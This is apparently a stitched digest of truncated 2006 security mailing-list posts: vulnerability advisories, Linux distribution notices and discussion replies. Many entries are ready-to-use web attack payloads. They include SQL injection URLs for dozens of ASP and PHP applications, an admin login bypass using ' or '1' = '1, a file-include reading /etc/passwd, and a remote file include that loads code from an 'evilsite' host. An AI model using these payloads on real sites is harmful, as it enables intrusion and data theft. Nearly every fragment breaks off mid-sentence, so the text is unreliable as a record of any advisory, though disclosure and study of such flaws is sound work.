Aria-Security's Research Team>
#
#Original Advisory at:
#http://www.aria-security.com/forum/showthread.php?t=37
#-
#
#Software: gNews Publisher
#Vendor: http://gazatem.com
#Method: SQL Injection
#
#Poc:
#
#http://target/categories.asp?catID=[SQL Injection]
#
Version: 1.0test53 .. 1.0.rc14 (ie. all 1.0alpha, 1.0beta and 1.0rc
versions in the middle).
0.99.x versions are safe (they don't even have mmap_disable setting).
Problem: When mmap_disable=yes setting is used (not default),
dovecot.index.cache file is read to memory using "file cache" code. It
c
vendor site: http://www.unverse.net/abitwhizzy/
product : aBitWhizzy
bug:local file include
global risk : high
http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
I've already posted an advisory about that here:
http://www.securityfocus.com/archive/1/450268
regards laurent gaffié
http://s-a-p.ca/
Hi,
The problem/bug that I described below affects SSLv2 servers and clients.
SSLv2 (still an option in the browsers) is vulnerable to this extension
attack.
Thanks.
Regards,
Omirjan Batyrbaev, CTO B3 Security Corp.
[EMAIL PROTECTED]
- Original Message -
From: "Omirjan Batyrbaev" <[EMAIL
==
Secunia Research 21/11/2006
- My Firewall Plus Privilege Escalation Vulnerability -
==
Table of Contents
Affected Software.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
#!/usr/bin/perl
# """
# """ :: ::: """
# """ :: :: :: : ::"""
# """ :: :: : : """
# """:: :: ::: ::: :: :: :: :::: """
# """ :: :: :: : : : :
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1217-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 20th, 2006
Product: cutenews 1.4.5
Vendor: http://cutephp.com
The Results through security analysis of cutenews
1.4.5
[provided by KAPDA.ir]
--
Test plan:
Manual penetration testing: YES
Using automated tools: NO
Code Auditing: YES
Statistical Results
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
Hi,
The problem/bug that I described below still affects SSLv2 servers and
clients.
SSLv2 (still an option in the browsers) is vulnerable to this extension
attack. SSL v3 and TLS are not affected.
Thanks.
Regards,
Omirjan Batyrbaev, CTO B3 Security Corp.
[EMAIL PROTECTED]
- Original Message -
Hey all,
What started out as a fun project for me turned out some serious results -
"Which is more secure? Oracle vs Microsoft" is a paper I put together
looking at the number of security flaws in the Oracle and MS database
offerings. For those that are interested, you can grab a copy of the re
vendor site: http://enthrallweb.com/
product : eClassifieds
bug:injection sql
risk : medium
injection sql :
/ad.asp?AD_ID='[sql]
/ad.asp?cat_id='[sql]
/dircat.asp?cid='[sql]
/dirSub.asp?sid='[sql]
/ad.asp?cat_id=35&sub_id='[sql]
/ad.asp?cat_id=35&sub_id=102&ad_id='[sql]
laurent gaffié & benjam
The Week of Oracle Database Bugs
Based on the great idea of H D Moore "Month of Browser
Bugs" and LMH "Month of Kernel Bugs", we are proud to
announce that we are starting on December the "Week of
Oracle Database Bugs" (WoODB).
What is the WoODB about?
An Oracle Database 0day will be released e
Is it me, or do you need to be root or a member of the operator group to
be able to perform an IOCTL on /dev/fw*. In FreeBSD at least, /dev/fw*
is only accessible by root (read/write) and members of the operator
group (read-only).
It might be a bug, I'll grant you that, but it's not disclosure to
On Mon, Nov 20, 2006 at 01:45:45PM -0500, Omirjan Batyrbaev wrote:
> This would have been a problem if the HMAC was just SHA-1(...) or MD5 (...)
> or similar type of prefix HMAC. However, the HMAC used in TLS is a more
> involved construct (see RFC 2104) and the attack is not applicable.
It is indee
vendor site: http://www.vspin.net/
product :Classified System
bug:injection sql
risk : medium
injection sql :
/cat.asp?cat='[sql]
/search.asp?in=y&keyword='[sql]
/search.asp?in=y&keyword=1&submit=Search&order='[sql]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort='[sql]
/se
***
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann
# S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
**
This directory traversal has already been discovered.
http://packetstormsecurity.org/0605-exploits/gphotos.txt
f4e2552282a5007bb84e7693bc78dac2 GPhotos versions 1.5 and below suffer from
directory traversal and cross site scripting flaws. Authored By Moroccan
Security
On Sat, Nov 18, 2006 a
Hi,
>
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> ___
>
> Mandriva Linux Security Advisory MDKSA-2006:217
> http://www.mandriva.com/security/
>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1215-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 20th, 2006
20/11/06
# Vulnerable product: mAlbum v0.3
# Official product site: http://satz.free.fr/
# Vulnerabilities:
1] Multiple Full path disclosure : http://localhost/malbum/index.php?gal=";>
2]Directory traversal :http://localhost/malbum/index.php?gal=../../../
#Screen cap
Indeed! It could offer a potential exploit.
I have released a patched version here:
http://www.dwalker.co.uk/forum/viewtopic.php?t=493
Firewall1954 (at) hotmail (dot) com - it is/would have been good practice to
contact the developer (me) before publishing your find.
If you had approached me wi
Challenge publication is 11.02.2006
http://www.digitalarmaments.com/challenge200611849937.html
I. Details
Digital Armaments officially announces the launch of the November-December hacking
challenge.
The challenge starts on November 1. For the November-December Challenge,
Digital Armaments will g
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1207-2[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 19th, 2006
Hi,
This would have been a problem if the HMAC was just SHA-1(...) or MD5 (...)
or similar type of prefix HMAC. However, the HMAC used in TLS is a more
involved construct (see RFC 2104) and the attack is not applicable.
- Original Message -
From: "Omirjan Batyrbaev" <[EMAIL PROTECTED]>
To:
--Security Report--
Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/10/06 09:44 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: Neocrome (http://www.neocrome.net)
Vers
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1214-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 20th, 2006
Hi,
I propose to use envelope method instead of currently used prefix method in
HMAC used in TLS/SSL. The measure is important especially since it was
pointed out that the
NULL cipher suites have a real use and since some ciphers are intentionally
weak. With the NULL cipher (or the easily broken 4
vendor site: http://www.grandora.com/
product : Rialto 1.6
bug:multiples injection sql , login bypass , xss
risk : high !
admin login bypass :
/admin/default.asp
username:' or '1' = '1
passwd: ' or '1' = '1
injection sql :
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
/printmain
Application : Ixprim CMS 1.2
URL
:http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip
variable ixpts.class.php
include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' );
Exploit :
http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1216-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 20th, 2006
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1213-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 19th, 2006
vendor site: http://enthrallweb.us/
product : ehomes
bug:injection sql
risk : medium
injection sql :
/dircat.asp?cid='[sql]
/dirSub.asp?sid='[sql]
/types.asp?TYPE_ID='[sql]
/homeDetail.asp?AD_ID='[sql]
/result.asp?city=1&cat='[sql]
/compareHomes.asp?compare='[sql]
/compareHomes.asp?compare=Compa
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:215
http://www.mandriva.com/security/
___
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:217
http://www.mandriva.com/security/
___
LS-20061113
LSsec has discovered a vulnerability in
Computer Associates BrightStor ARCserve
Backup v11.5, which could be exploited by
an anonymous attacker in order to execute
arbitrary code with SYSTEM privileges on
an affected system.
The flaw specifically exists within the
Tape Engine (tapeeng
vendor site: http://softacid.net/
product:Link Exchange Lite
bug: injection sql
risk : high
injection sql (post) :
/search.asp
post your sql query into the search engine field
injection sql (get):
/linkslist.asp?psearch='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [EMAIL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1218-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 21st, 2006
vendor site:http://klf-design.com/
product :klf-realty
bug:injection sql
risk : medium
injection sql :
/search_listing.asp?category='[sql]
/detail.asp?property_id='[sql]
/search_listing.asp?agent='[sql]
laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
===
Ubuntu Security Notice USN-384-1 November 20, 2006
openldap2.2 vulnerability
CVE-2006-5779
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6
A terminology question for people.
In this reference:
BUGTRAQ:20061115 Re: DragonFlyBSD all versions FireWire IOCTL kernel integer
overflow information disclousure
http://www.securityfocus.com/archive/1/archive/1/451677/100/0/threaded
The issue is being described as an integer overflow.
I
On Tue, 2006-11-21 at 15:38 +, [EMAIL PROTECTED] wrote:
> I've already posted an advisory about that here:
>
> http://www.securityfocus.com/archive/1/450268
>
>
>
> regards laurent gaffi
> http://s-a-p.ca/
>
The GLSA is a notice to Gentoo users that the package in question had a
vulnerab
Error PostNuke in the variable stop which can be exploited by malicious
people to disclose system information. Luckily the vulnerability
affects the 0.7.5.0 version and minors.
POC:
http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value)
Example:
http://www.dev-postnuke.com/us
===
Ubuntu Security Notice USN-381-1 November 16, 2006
firefox vulnerabilities
CVE-2006-5462, CVE-2006-5463, CVE-2006-5464, CVE-2006-5747,
CVE-2006-5748
===
A security issue af
===
=Bug was found in the part of phpBB
=
=Dork : "Powered by Dimension"
=
=Expl : includes/functions.php?phpbb_root_path=
=
=Source Code : http://www.xs4all.nl/~hkicken/plusxl20/phpbb2_plusxl_20_272.zip
=
=Found by : Ren
vendor site: http://www.creascripts.com/
product:creadirectory
bug: injection sql & xss
risk : medium
injection sql:
/search.asp?search=1&submit=Search&category='[sql]
xss:
/addlisting.asp?cat=[xss]
/search.asp?search=[xss]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PRO
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ContentNow CMS 1.39 'pageid' Sql Injection + Path Disclosure
Severity : Medium Risk
Vendor : http://www.contentnow.mf4k.de/
Author : Revenge
[--]
[#] Description
ContentNow is a PHP Content Manage
vendor site: http://www.rockfordarea.com/
product : The Classified Ad System
bug: multiple xss (get) & injection sql
risk : medium
injection sql (get):
/default.asp?action=view&main='[sql]
injection sql (post) :
just post your query into the search engine
xss :
/default.asp?action=view1&cat=[
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:216
http://www.mandriva.com/security/
___
> -Original Message-
> From: Reversemode [mailto:[EMAIL PROTECTED]
> Sent: Thursday, November 16, 2006 11:15 AM
> To: Securityfocus
> Subject: [Reversemode advisory] Computer Associates HIPS
> Drivers - multiple local privilege escalation vulnerabilities.
>
>
> Computer Associates "Ho
vendor site:http://www.jiros.net/
product:JiRos Links Manager
bug: injection sql & xss
risk : medium
injection sql:
/openlink.asp?LinkID='[sql]
/viewlinks.asp?CategoryID='[sql]
xss permanent (post):
in: /submitlink.asp
-Link Name:
-Link URL:
-Link Image:
-Link Description:
those xss are reall
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
- - ---
VMware Security Advisory
Advisory ID: VMSA-2006-0010
Synopsis: SSL sessions not authenticated by VC Clients
Patch URL:http://www.vmware.com/dow
===
Ubuntu Security Notice USN-382-1 November 16, 2006
mozilla-thunderbird vulnerabilities
CVE-2006-5462, CVE-2006-5463, CVE-2006-5464, CVE-2006-5747,
CVE-2006-5748
===
A secur
#!/usr/bin/perl
#
#
#Shopping_Catalog
--Security Report--
Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/10/06 09:44 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: Neocrome (http://www.neocrome.net)
vendor site: http://www.4u2ges.com/
product : Rapid Classified v3.1
bug: multiple xss (get) & injection sql
risk : medium
injection sql :
/viewad.asp?id='[sql]
xss :
/reply.asp?id=[xss]
/view_print.asp?id=[xss]
/search.asp?categoryName=1&SH1=[xss]
/reply.asp?id=5012081548011&name=[xss]
/advs